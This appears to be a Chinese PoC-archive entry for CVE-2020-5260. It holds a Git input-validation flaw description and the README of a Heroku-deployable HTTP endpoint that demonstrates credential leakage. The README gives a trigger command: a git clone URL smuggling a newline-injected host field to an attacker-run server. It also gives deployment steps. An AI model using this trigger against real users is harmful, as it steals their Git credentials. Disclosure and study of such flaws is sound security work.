关联漏洞
标题:Git 输入验证错误漏洞 (CVE-2020-5260)Description:Git是一套免费、开源的分布式版本控制系统。 Git中存在输入验证错误漏洞。攻击者可借助特制URL利用该漏洞获取私人证书。以下产品及版本受到影响:Git 2.17.3及之前版本、2.18.2及之前版本、2.19.3及之前版本、2.20.2及之前版本、2.21.1及之前版本、2.22.2及之前版本、2.23.1及之前版本、2.24.1及之前版本、2.25.2及之前版本、2.26.0及之前版本。
Description
A HTTP PoC Endpoint for cve-2020-5260 which can be deployed to Heroku
介绍
# cve-2020-5260
A HTTP PoC Endpoint for cve-2020-5260 which can be deployed to Heroku
# CREDIT INFORMATION
Felix Wilhelm of Google Project Zero
https://bugs.chromium.org/p/project-zero/issues/detail?id=2021
# Trigger the vuln
```
git clone 'https://YourHerokuAppNameAndNotMine.herokuapp.com?%0ahost=github.com%0aprotocol=ssh'
```
# Get PoC onto Heroku
Click this button to automagically deploy to Heroku...
[](https://heroku.com/deploy)
Or follow the steps below...
Yes, I understand the irony of having to run Git clone commands to setup this PoC....
### Install the Heroku CLI via https://devcenter.heroku.com/articles/heroku-cli
If you haven't already, log in to your Heroku account and follow the prompts to create a new SSH public key.
```
$ heroku login
```
### Clone the repository
Use Git to clone cve-2020-5260's source code to your local machine.
```
$ mkdir cve-2020-5260
$ cd cve-2020-5260
$ git init
$ heroku apps:create cve-2020-5260
$ git clone https://github.com/brompwnie/cve-2020-5260
```
### Deploy your changes
Make some changes to the code you just cloned and deploy them to Heroku using Git.
```
$ git add .
$ git commit -am "make it better"
$ git push heroku master
```
文件快照
[4.0K] /data/pocs/a95325fa85df922d03c5b2791f72d07516596c2d
├── [ 267] app.json
├── [ 87] go.mod
├── [1.0K] LICENSE
├── [1.4K] main.go
├── [ 19] Procfile
└── [1.2K] README.md
0 directories, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。